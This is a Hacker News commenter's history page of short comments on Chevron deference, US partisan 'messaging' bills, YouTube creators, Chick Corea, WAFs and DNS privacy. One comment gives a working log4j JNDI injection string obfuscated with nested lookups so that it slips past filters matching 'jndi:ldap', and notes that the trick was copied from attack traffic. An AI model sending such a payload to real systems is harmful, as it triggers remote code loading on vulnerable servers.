Hacker News: _null_'s comments

>shift that determination from agency specialists to judges

All correct until this bit. They in fact want to shift it back to congress, who should do a better job in specifying what power they delegate to unelected heads of executive branch agencies.


> All correct until this bit. They in fact want to shift it back to congress,

That is one potential, down-the-road outcome of non-qualified judges being inserted into the process. Stalling oversight is the outcome that dominates all of it tho.

> congress, who should do a better job in specifying what power they delegate to unelected heads of executive branch agencies.

A law with every possible contingency cannot be written. It's why Congress signals the desired outcomes in the language of the law and expects qualified agency employees to bring those outcomes to fruition.


https://www.nrdc.org/stories/what-happens-if-supreme-court-e...

> The idea behind such deference is that expert agencies, accountable to an elected president, are better suited than federal judges to make the policy choices that Congress left open.

>At the time of the 1984 Chevron v. NRDC ruling, Doniger notes, it was widely perceived in legal and political circles that judges in the lower federal courts were inappropriately crafting policy by deciding for themselves what certain laws meant, effectively substituting their own ideas for the discernment of agency experts. “So the Supreme Court was basically saying to the lower courts: Stop inserting your own policy preferences under the guise of interpreting the law,” Doniger says.

> Now the Supreme Court could reopen the door for federal judges to decide how executive-branch agencies should go about their daily business whenever Congress has used ambiguous language


I don't know if you have been following politics recently, but this sounds like a bad idea unless the idea is to kill the process (which is the desired outcome of the strategy). There's no way Congress can handle more of a workload, nor should they be in charge of this; that should be in the bureaucracy, not with the politicos.


> They in fact want to shift it back to congress

When Congress does that and there is a dispute, it ultimately falls to judges to adjudicate until Congress can update the law.


This is just the first in a long list of "messaging" bills that will come from a very slim Republican House, because there is Democratic control of the Senate.

They know it won't become law. The point is to rile up the media, get hits on cable news, fund raise, and generally be useless as a governing body. This is what both parties do when they are out of power, and I would say is what they _prefer_ to do. It's easier than governing, makes them money, gets them media attention, etc.

Both parties here in the US _want_ to be minority parties so that they can behave this way and assume no actual responsibility for anything.


I really don't get this “both parties” attitude. There is no basis for that argument. There is a lot to criticize about Democrats, but they at least want to govern.


The "Green New Deal" was 100% a messaging bill, never intended to pass, and was admitted to be as such by those that drafted it. Just one example.

*I'd argue that most people in either party do _want_ to govern. But each one is being hijacked by loud minorities who would rather perform.


Democrats want to govern? Maybe you want to check the 10 bottom cities in America, say by crime rate and poverty metrics. Name the top 10 cities or even towns in the USA and check which party is doing the governing.


The kind of people who want to govern other people are not the kind of people we should encourage.


>They know it won't become law

Didn't Brexit start as a "there's no way this will actually happen" signaling gesture by establishment Conservatives?


There is literally no way a Democrat controlled Senate even reads this bill.

To your point though, a good example of that kind of thing is the idiocy of Republican states who passed years of anti-abortion "trigger laws" in case Roe/Casey were ever overturned. They all assumed those precedents would never be overturned, and so they could be as extreme as they wanted.

Now they are reckoning with their posturing.


Will voters barely making ends meet dealing with inflation prefer the party that doesn't send government agents to attack them while they are struggling?


Also, Musk repeatedly said publicly that he wanted to buy the platform specifically to address the issue of bot accounts.


Lots of mail gateways / mail security appliances do DNS lookups of URLs in the message body in order to check domain reputation and filter phishing links. It looks like he's using a DNS canary token which would be triggered by those as well.


Yep, see later in the thread for how I'm avoiding that now; basically it uses a second level of interpolation so that it will only expand to the token when log4j is expanding it:

    ${jndi:ldap://${::-t}${::-o}${::-k}${::-e}${::-n}/a}
I stole this trick from my Apache logs; people are using it to bypass dumb filters that just trigger on "jndi:ldap".


The fact this apparently triggers an error in Reddit is freaking hilarious.


Many WAFs now block HTTP requests that will exploit it. Cloudflare (not what Reddit uses) does it for all customers automatically, for example.


>YouTube will never change and it will only get worse.

Private entities can be swayed by their customers' demands. Not saying that YT _will_ be swayed, just that this sort of creator outrage has a place in the market system, and "throwing a tantrum" over their bad behavior doesn't always have to be met with "private entities can do whatever they want!"


That actually sounds like a good test for monopoly status: do you have to worry about what your customers want/desire, or are you so entrenched that you don't care?


Chick has been my favorite since I began playing jazz in High School 20 years ago. Endlessly creative and a masterful player up until his last day. Since the pandemic started I've been watching him stream on IG and YT. He never lost a note and was always exploring new composers, techniques, and ways to expand his musical world. An absolute wonder and inspiration.

I never imagined that this story would be on the front page of HN. It's like seeing two of my worlds collide out of nowhere.


Serious question: Why does the bank care about the TLS key exchange?


Some businesses have to run WAF products for regulatory compliance, which is typically implemented via TLS decryption at a WAF. There are ways to do TLS decryption with ephemeral keys but many orgs just use the easy way of just giving the WAF the RSA key.


>Running your own resolver will give the authoritative servers the IP address of the request, but does this leak any assets to any potential attacker? The owner behind the authoritative servers already gets the web logs, so what additional information is being leaked?

This is addressed in the panel. The argument is that there is some "privacy mixing" because owner of the authoritative server only sees a highly-trafficked resolver as the source, and not your home network resolver.


Yes, the authoritative server gets less data from the DNS server, but the owner of the domain already gets the information from web server logs and similar sources. I do not see how DNS mixing provides any privacy in any common threat model.

In the first case a client that requests a webpage contacts company X's authoritative server with private information [IP ADDRESS], creating a record on the DNS server, and then visits company X's web server, creating a second record at the same company with the same [IP ADDRESS].

In the second case a client requests a webpage of company X by contacting Google, creating a record on Google's DNS server with [IP ADDRESS], and then visits company X and creates a record there with [IP ADDRESS].

In one case one company has the data, and in the second case two companies have the data. It does not make any sense.


Tangential anecdote: I supported a product recently that had a password generator feature that admins could use to create a “random” password for a new user account. The password would be emailed to the user (the admin never saw it). The generator used a wordlist file that the developers must have grabbed from an online dictionary. It was about 10k words and contained MANY offensive ones. Pretty much any obscenity you could imagine and more. It was obvious no one had sanitized it.

I filed a bug a couple years ago but it still isn’t fixed. Luckily it’s a seldom used feature, and I haven’t seen anyone affected yet.


This seems like pure laziness. Did the developers really not have an understanding of basic PKI? Or did they realize late in the game that their local web socket was gonna require HTTPS and slap this on at the last minute?


Why should developers care if customers don't?

Do we know of a single B2C company that lost business due to security breaches in its products?

